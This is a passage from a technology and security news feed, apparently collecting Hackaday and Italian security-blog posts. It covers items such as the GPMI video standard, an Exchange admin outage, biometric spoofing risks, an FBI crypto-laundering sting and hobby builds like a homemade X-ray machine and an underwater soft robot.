While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that this activity could be mistaken for that of another actor.


securelist.com/goffee-apt-new-…


Everyone’s Talking GPMI, Should you?


The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.


hackaday.com/2025/04/10/everyo…


HTTP 500 on Exchange Admin Center: worldwide blackout, administrators locked out!


A global outage has prevented administrators from accessing the Exchange Admin Center (EAC). Microsoft immediately placed the problem under investigation. Since the outage began yesterday, affected IT administrators have reported HTTP 500 errors when trying to access the Exchange admin portal.

Microsoft has reported that the issue is critical and has flagged it under incident EX1051697 in the Microsoft 365 admin center. However, as Microsoft itself suggested, some administrators were able to reach the admin center via the URL admin.cloud.microsoft/exchange…

Microsoft stated the following: “We have identified an increase in error spikes and are investigating further. We are also reviewing recent changes made to the service as a possible root cause.” In a subsequent message center update, Redmond said that its engineers had reproduced the problem internally and collected additional diagnostic data to assist the troubleshooting process.

To deal with the problem, Microsoft began automatically redirecting administrators to the working URL as a temporary workaround. Microsoft later reported the following: “We have identified a potential authentication issue in a specific URL path and are working to mitigate the issue by redirecting the affected URL traffic to a working URL,” the company said in a Microsoft 365 admin center update.

The problem has now been resolved by Microsoft and the service is operating normally again.

The article HTTP 500 on Exchange Admin Center: worldwide blackout, administrators locked out! originally appeared on il blog della sicurezza informatica.


The Myth of Secure Biometrics! The Shocking Truth About New Digital Attacks


If your password is compromised, you change your password. If your fingerprint is compromised, you can't change your finger.

With that necessary premise stated, biometric authentication is actively replacing traditional passwords and PIN codes, offering a more convenient and, as is commonly believed, reliable method of confirming identity. Fingerprints, facial features, voice and even the shape of the ears have become part of the modern digital landscape.

However, the rapid spread of these technologies has not come without consequences: along with convenience, the level of abuse has also grown. Criminal interest in biometrics is no longer hypothetical: criminals are increasingly exploiting its vulnerabilities in real attacks.

According to Europol data, the number of cases involving the deception of biometric systems has increased significantly. Attackers' main focus is on so-called presentation attacks, whose essence is the forgery or imitation of biometric characteristics in order to deceive the authentication system.

A simple example would be a silicone replica of a fingerprint made from a photograph or a physical sample. Such fakes can be made at home using readily available materials; modern 3D printers allow even more precise replicas to be created.

Facial recognition systems are also proving vulnerable. Criminals use silicone masks, makeup, software morphing algorithms and deepfake technologies. The latter make it possible not only to alter an image but also to synthesize a voice, imitating the speech of a particular person.

Such methods are actively used to bypass security systems, including in banking and government services. For example, there have been cases in which deepfakes were used to bypass identification in remote service systems. As Europol notes, the vector of abuse is no longer limited to forging data. It also includes the extraction of biometric profiles that can be used for tracking, blackmail or even mass surveillance.

Technologies designed to strengthen security turn into a means of attack in the hands of criminals. Moreover, once compromised, biometric data cannot be replaced: unlike a password, a fingerprint or the shape of a face remains the same for life.

To counter the new threats, law enforcement must go beyond the traditional response. Europol stresses the importance of close collaboration with researchers and security experts. By working together it is possible not only to anticipate attack vectors but also to implement protective measures quickly. This includes threat monitoring, timely updates to algorithms, and mandatory labelling and analysis of incidents involving the bypassing of biometric systems.

Particular attention is proposed for raising awareness among police officers, forensic experts and technical specialists. Understanding the specifics of biometric attacks, being able to recognize the traces of their use, and being able to work with biometric data during investigations is becoming of fundamental importance. This is not only about protecting systems but also about the legal classification of such offences, which is still far from perfect.

The Europol report stresses that without an adequate response from law enforcement, society risks losing trust in biometrics as a technology of the future. At a time when cybercrime is reaching new levels, what is needed is not only technical solutions but also a clear strategy that unites the efforts of the state, business and the scientific community. This is the only way to maintain the balance between security and convenience that was originally at the heart of biometric development.

The article The Myth of Secure Biometrics! The Shocking Truth About New Digital Attacks originally appeared on il blog della sicurezza informatica.


Making Liquid Oxygen: Far From Easy but Worth the Effort


Normally, videos over at The Signal Path channel on YouTube have a certain vibe, namely teardowns and deep dives into high-end test equipment for the microwave realm. And while we always love to see that kind of content, this hop into the world of cryogenics and liquid oxygen production shows that [Shahriar] has other interests, too.

Of course, to make liquid oxygen, one must first have oxygen. While it would be easy enough to get a tank of the stuff from a gas supplier, where’s the fun in that? So [Shahriar] started his quest with a cheap-ish off-the-shelf oxygen concentrator, one that uses the pressure-swing adsorption cycle we saw used to great effect with DIY O2 concentrators in the early days of the pandemic. Although analysis of the machine’s output revealed it wasn’t quite as capable as advertised, it still put out enough reasonably pure oxygen for the job at hand.

The next step in making liquid oxygen is cooling it, and for that job [Shahriar] turned to the cryocooler from a superconducting RF filter, a toy we’re keen to see more about in the future. For now, he was able to harvest the Stirling-cycle cryocooler and rig it up in a test stand with ample forced-air cooling for the heat rejection end and a manifold to supply a constant flow of oxygen from the concentrator. Strategically placed diodes were used to monitor the temperature at the cold end, a technique we can’t recall seeing before. Once powered up, the cryocooler got down to the 77 Kelvin range quite quickly, and within an hour, [Shahriar] had at least a hundred milliliters of lovely pale blue fluid that passed all the usual tests.

While we’ve seen a few attempts to make liquid nitrogen before, this might be the first time we’ve seen anyone make liquid oxygen. Hats off to [Shahriar] for the effort.

youtube.com/embed/kakZ_fhfUHU?…


hackaday.com/2025/04/09/making…


Ask Hackaday: Vibe Coding


Vibe coding is the buzzword of the moment. What is it? The practice of writing software by describing the problem to an AI large language model and using the code it generates. It’s not quite as simple as just letting the AI do your work for you because the developer is supposed to spend time honing and testing the result, and its proponents claim it gives a much more interactive and less tedious coding experience. Here at Hackaday, we are pleased to see the rest of the world catch up, because back in 2023, we were the first mainstream hardware hacking news website to embrace it, to deal with a breakfast-related emergency.

Jokes aside, though, the fad for vibe coding is something which should be taken seriously, because it’s seemingly being used in enough places that vibe coded software will inevitably affect our lives. So here’s the Ask Hackaday: is this a clever and useful tool for making better software more quickly, or a dangerous tool for creating software nobody quite understands, containing bugs which could cause a disaster?

Our approach to writing software has always been one of incrementally building something from the ground up, which satisfies the need. Readers will know that feeling of being in touch with how a project works at all levels, with a nose for immediately diagnosing any problems that might occur. If an AI writes the code for us, the feeling is that we might lose that connection, and inevitably this will lead to less experienced coders quickly getting out of their depth. Is this pessimism, or the grizzled voice of experience? We’d love to know your views in the comments. Are our new AI overlords the new senior developers? Or are they the worst summer interns ever?


hackaday.com/2025/04/09/ask-ha…


Going to the Top with a Raspberry Pi Elevator


[BorisDigital] was mesmerised by a modern elevator. He decided to see how hard it would be to design his own elevator based on Raspberry Pis. He started out with a panel for the elevator and a call panel for the elevator lobby. Of course, he would really need three call panels since he is pretending to have a three-floor building.

It all looks very professional, and he has lots of bells and whistles, including an actual alarm. With the control system perfected, it was time to think about the hydraulics and mechanical parts to make a door and an actual lift.

It is still just a model, but he does have 10A AC switches for the pumps. Everything talks via MQTT over WiFi. There’s also a web-based control dashboard. We didn’t count how many Pi boards are in the whole system, but it is definitely more than three.

If you are wondering why this was built, we are too. But then again, we never really need an excuse to go off on some project, so we can’t throw stones.

Want to see a more practical build? Check it out. Perhaps he’ll start on an escalator next.

youtube.com/embed/eTpAalJFUlY?…


hackaday.com/2025/04/09/going-…


FLOSS Weekly Episode 828: Incus Inception


This week, Jonathan Bennett and Rob Campbell talk to Stéphane Graber about LXC, Linux Containers, and Incus! Why did Incus fork from LXD, why are Fortune 500 companies embracing it, and why might it make sense for your home lab setup? Watch to find out!


youtube.com/embed/tiS7QU4ABnY?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/04/09/floss-…


Self-Hosting a Cluster on Old Phones


The phones most of us carry around in our pockets every day hold a surprising amount of computing power. It’s somewhat taken for granted now that we can get broadband in our hands in most places; so much so that when one of these devices has reached the end of its life it’s often just tossed in a junk drawer, even though its capabilities would have been miraculous only 20 years ago. But those old phones can still be put to good use, and [Denys] puts a few of them back to work running a computing cluster.

Perhaps the most significant flaw of smartphones, though, is that most of them are locked down so much by their manufacturers that it’s impossible to load new operating systems on them. For this project you’ll need to be lucky enough (or informed enough) to have a phone with an unlockable bootloader so that a smartphone-oriented Linux distribution called postmarketOS can be installed. With this nearly full-fledged Linux distribution to work from, the phones can be accessed by ssh and then used to run Kubernetes for the computing cluster. [Denys] has three phones in his cluster that run a few self-hosted services for him.

[Denys] also points out in his guide that having a phone that can run postmarketOS might save some money when compared to buying a Raspberry Pi to run the same service, and the phones themselves can often be more powerful as well. This is actually something that a few others have noted in the past as well. He’s gone into a considerable amount of detail on how to set this up, so if you have a few old smartphones gathering dust, or even those with broken screens or other physical problems where the underlying computing resources are still usable, it’s a great way to put these machines back to work.

Thanks to [mastro Gippo] for the tip!


hackaday.com/2025/04/09/self-h…


You Shouldn’t Build an X-Ray Machine, But You Could


Ever wanted your own X-ray machine? Of course you have! Many of us were indoctrinated with enticing ads for X-ray specs and if you like to see what’s inside things, what’s better than a machine that looks inside things? [Hyperspace Pirate] agrees, and he shows you the dangers of having your own X-ray machine in the video below.

The project starts with an X-ray tube and a high voltage supply. The tube takes around 70,000 volts which means you need a pretty stout supply, an interesting 3D printed resistor, and some mineral oil.

The output display? A normal camera. You also need an intensifying screen, which is just a screen with phosphor or something similar. He eventually puts everything in lead and reminds you that this is a very dangerous project and you should probably skip it unless you are certain you know how to deal with X-ray dangers.

Overall, looks like a fun project. But if you want real credit, do like [Harry Simmons] and blow your own X-ray tube, too. We see people build similar machines from time to time. You shouldn’t, but if you do, remember to be careful and to tell us about it!

youtube.com/embed/4NRkFqeO27Y?…


hackaday.com/2025/04/09/you-sh…


In 2025, The Philly Maker Faire Finds Its Groove


The first Philadelphia Maker Faire was extremely impressive, and seemed poised to be one of the premier maker events on the East Coast. Unfortunately, it had the misfortune of happening just a few months before COVID-19 made such events impossible. Robbed of all its momentum, the event tried out different venues after the shadow of the pandemic was gone, but struggled to meet the high bar set by that inaugural outing.

But after attending the 2025 Philadelphia Maker Faire this past weekend, I can confidently say the organizers have moved the needle forward. This year marks the second time the event has been held at the Cherry Street Pier, a mixed-use public space with an artistic bent that not only lends itself perfectly to the spirit of Maker Faire but offers room for expansion in the future. The pier was packed with fascinating exhibits and excited attendees, and when the dust settled, everyone I spoke to was thrilled with how the day went and felt extremely positive about the future of the Faire.

Providing coverage of an event like this is always difficult, as there’s simply no way I could adequately describe everything there was to see and do. The following represents just a few of the projects that caught my eye; to see all that the Philadelphia Maker Faire has to offer, I’d strongly suggest you make the trip out in 2026.

Wasteworld Toys


Of all the awesome projects I saw during the Faire, the one that stuck with me the most has to be Brett Houser’s Wasteworld Toys. This incredible collection of hand-made remote controlled vehicles evokes the look and feel of the Mad Max universe, but is populated with its own cast of post-apocalyptic characters that come from the depths of Brett’s obviously considerable imagination.

Whether you saw them as pieces of art or electronic marvels, it was impossible not to be impressed with the work Brett put into these builds. While there were some 3D printed parts and cannibalized model kits, much of the raw material used to build the vehicles and characters came from the trash. Brett has an eye for repurposing everyday objects, like taking the metal top from a disposable lighter and turning it into an armored faceplate for one of his Wasteworld warriors.

Beyond being able to simply drive them around, most of the vehicles had some secondary function. One was equipped with an Airsoft cannon, another had a functional flame-thrower, and there was even a mobile rocket launcher that actually fired tiny rockets. They weren’t all weapons of war though: there was a surveillance van that featured a tiny display showing nearby WiFi networks, and a tricked-out station wagon that had an emulated version of Contra running in the back that you could play with a Bluetooth PlayStation controller.

Many of the vehicles featured first person view (FPV) capabilities, with the cameras so expertly hidden on the vehicles and cybernetic characters that at first glance you assume they’re just part of the visual theme and not functional components. To make the experience even more immersive, several vehicles featured displays that were really only visible when looking through the FPV gear, such as digital readouts of the system’s battery voltage.

As impressive as the vehicles of Wasteworld Toys were, it was perhaps Brett himself who left the biggest impression on me. Humble, affable, and eager to share the intricate details of his work, he was even willing to hand the controls of his creations over to attendees, much to their delight. The Wasteworld couldn’t have asked for a better ambassador.

Myelin BCI Board


Hackaday readers may recall the OpenBCI project, which made some headlines about a decade ago with their relatively low-cost development boards for experimenting with brain-computer interfaces (BCIs). We covered a few projects that used their software and hardware, including a flying shark controlled by EEG signals.

It turns out that OpenBCI has now turned their attention to some kind of mixed reality headset that costs as much as a new car, leaving the future of their more hobbyist friendly hardware in question. Which is why Mike Recine has been working on the Myelin, an open source hardware project that continues the legacy of OpenBCI’s early work. Powered by the ESP32, the battery-powered board can wirelessly link to your phone or computer to deliver 16 channels of EEG data.

Mike is hoping to launch a Kickstarter for the hardware soon, offering up assembled and ready-to-use Myelin boards. Kits are also on the horizon, and of course as an open source hardware project, spinning up your own board will be an option as well. The project doesn’t have much of an online presence currently, but interested parties can sign up to be notified when more information goes live.

A Cardboard Table Saw


The ChompSaw is advertised as a “kid-safe power tool for cutting cardboard”, but it doesn’t take long to realize that’s selling the machine a bit short. There’s no blade in the machine; instead, it uses a small metal piston to rapidly nibble away at the cardboard, a mechanism that co-founder Max Liechty says could be thought of as a “full-auto hole punch.” Even though there’s no blade, the business end of the ChompSaw is still under a protective cover that keeps anything thicker than 3 mm cardboard out. You couldn’t hurt yourself with this machine if you tried.

It rapidly rips through cardboard in any direction, making it easy to follow patterns and cut out complex shapes. Though it was designed primarily for common cardboard (think: all those Amazon boxes you’ve got stacked up), it can chew through other thin materials such as paper, foam, and plastic, opening up even more possibilities.


The ChompSaw brought in over $1 million during its 2023 Kickstarter campaign, and is available for purchase through their site. While it might not seem like the kind of machine we’d usually get excited about at Hackaday, its ability to cut through foam and other materials holds promise for more practical applications than rainy day arts and crafts. Plus, one should never underestimate the value of CAD: Cardboard Aided Design.

The Sights of Philly Maker Faire

The Road Ahead


In addition to the attendees and exhibitors, I also got the chance to talk to some of the folks behind the Philadelphia Maker Faire. It will probably come as no surprise to hear they all share a passion for discovering and showcasing local talent, and are very excited about the future of the event. There was even some talk about coordinating efforts with other art and tech events in the area such as JawnCon.

Considering they were up against some dreary weather, the organizers were encouraged by the fantastic turnout. Similarly, the venue itself was more than up to the challenge, and should have no trouble supporting the event as it grows. Put simply, the Philadelphia Maker Faire has found its stride, and promises to be even bigger and better next year. If you’re in the Northeast US, this is an event you should keep on your calendar for 2026 and beyond.


The Little Post Office That Fooled Half the Internet! The FBI's Undercover Operation


A small post office in the state of Kentucky (USA) became the starting point of one of the FBI's biggest covert operations of recent years. On September 17, 2021, a box contained what looked like an ordinary package of children's books, but inside the book were envelopes holding thousands of dollars in cash.

The money came from a person known as ElonmuskWHM, one of the darknet's main money launderers, who operated on the White House Market platform. His services were used by criminals who wanted to cash out cryptocurrency without going through legal platforms that required identity verification. The FBI decided not only to catch him but also to take over his business, thereby becoming the “cashier” of the criminal world.

Behind ElonmuskWHM was a thirty-year-old Indian citizen, Anurag Pramod Murarka, who was lured to the United States via an approved visa and arrested at the airport. Then, for almost a year, FBI agents continued to run the business in his name. The customers had no idea that they were transferring cryptocurrency and receiving cash in exchange through services organized by the intelligence agency, which recorded everything, from addresses to links with other criminals.

The operation led to the discovery of drug dealers in Miami, armed robberies in San Francisco and criminal hackers behind multi-million-dollar attacks. Under the guise of an exchange office, the agents did far more than merely observe: they also supplied money to hackers so that they would reveal themselves.

One such case concerns Remington Ogletree. During the investigation, he ordered $75,000 via Telegram, not knowing that the “exchanger” was already controlled by the FBI. The money was sent to him with a USPS tracking number, which made it possible to establish new details about his activities. Ogletree was later arrested, but continued operating for almost a year, unaware that he was under surveillance.

To reach Murarka, agents analyzed the blockchain, searched for matches in visa applications and used more controversial methods. For example, the FBI asked Google for the data of all users who had watched YouTube videos sent to a suspect by text message, a move that drew criticism for potentially violating constitutional rights.

In addition, agents tracked down the money senders in New York. One of them, code-named “Eric”, became an FBI informant. He continued to transport cash undercover, using a hidden body-worn camera, thereby helping to identify the participants in the scheme. From February to September, Eric made around 80 deliveries worth more than $15 million, gathering new evidence. The money was carried through shops, parking lots and restaurants, from where the mules traveled across states.

Video clip from the informant's camera (404 Media)

Documents relating to these episodes were not always linked to ElonmuskWHM, but the details (phone numbers, dates and methods of operation) were consistent. Investigators believe that Murarka integrated his scheme into an ancient money transfer system known as hawala or angadia, adapting it to cryptocurrency.

Murarka had previously run a geoinformation company and had even sent the agents YouTube videos of his previous job, unaware that his every click was being tracked. Investigators confirmed his identity based on data from Google, Uber, Binance and Apple.

YouTube videos sent to customers. The videos were viewed around 2,000 and 1,400 times respectively (404 Media)

In January 2025, the court sentenced Murarka to 121 months (10 years and 1 month) in prison. Investigators said Murarka had founded one of the largest cryptocurrency exchanges in the world, taking in more than $24 million in less than two years. An FBI spokesperson added that the agency will use all necessary means to expose criminal networks, even if that means laundering money.

The article The Little Post Office That Fooled Half the Internet! The FBI's Undercover Operation originally appeared on il blog della sicurezza informatica.


Forget Propellers, Embrace Tentacle-based Locomotion


Underwater robots face many challenges, not least of which is how to move around. ZodiAq is a prototype underwater soft robot (link is to research paper) that takes an unusual approach to this problem: multiple flexible appendages. The result is a pretty unconventional-looking device that can not only get around effectively, but can do so without disturbing marine life.

ZodiAq sports a soft flexible appendage from each of its twelve faces, but they aren’t articulated like you might think. Despite this, the device can crawl and swim.
With movement inspired by bacterial flagella, ZodiAq moves in an unusual but highly controllable way.
Each soft appendage is connected to a motor, which rotates the attached appendage. This low-frequency but high-torque rotation, combined with the fact that each appendage has a 45° bend to it, has each acting as a rotor. Rotation of the appendages acts on the surrounding fluid, generating thrust. When used together in the right way, these appendages allow the unit to move in a perfectly controllable manner.

This locomotion method is directly inspired by the swimming gait of bacterial flagella (which the paper mentions are regarded as the only example of a biological “wheel”).

How fast can it go? The prototype covers a distance of two body lengths every fifteen seconds. True, it’s no speed demon compared to a propeller, but it doesn’t disturb marine life or environments as it moves around. This method of movement has a lot going for it. It’s adaptable and doesn’t use all twelve appendages at once; so there’s redundancy built in. If some get damaged or go missing, it can still move, just slower.

ZodiAq’s design strikes us as a very accessible concept, should any aspiring marine robot hackers wish to give it a shot. We’ve seen other highly innovative and beautiful underwater designs as well, like body-length undulating fins and articulated soft arms.

We do notice that since it lacks a “front”, it might be a challenge to decide how to mount something like a camera. If you have any ideas, share them in the comments.


hackaday.com/2025/04/09/forget…


Better Bearings Take the Wobble Out of Premium Scroll Wheel


Sitting in front of a computer all day isn’t exactly what the firmware between our ears was tuned to do. We’re supposed to be hunting and gathering, not hunting and pecking. So anything that makes the computing experience a little more pleasurable is probably worth the effort, and this premium wireless scroll wheel certainly seems to fit that bill.

If this input device seems familiar, that’s because we featured [Engineer Bo]’s first take on this back at the end of 2024. That version took a lot of work to get right, and while it delivered high-resolution scrolling with a premium look and feel, [Bo] just wasn’t quite satisfied with the results. There were also a few minor quibbles, such as making the power switch a little more user-friendly and optimizing battery life, but the main problem was the one that we admit would have driven us crazy, too: the wobbling scroll wheel.

[Bo]’s first approach to the wobble problem was to fit a larger diameter bearing under the scroll wheel. That worked, but at the expense of eliminating the satisfying fidget-spinner action of the original — not acceptable. Different bearings yielded the same result until [Bo] hit on the perfect solution: a large-diameter ceramic bearing that eliminated the wobble while delivering the tactile flywheel experience.

The larger bearing left more room inside for the redesigned PCB and a lower-profile, machined aluminum wheel. [Bo] also had a polycarbonate wheel made, which looks great as is but would really be cool with internal LEDs — at the cost of battery life, of course. He’s also got plans for a wheel machined from wood, which we’ll eagerly await.

youtube.com/embed/tzqJ1rJURgs?…


hackaday.com/2025/04/09/better…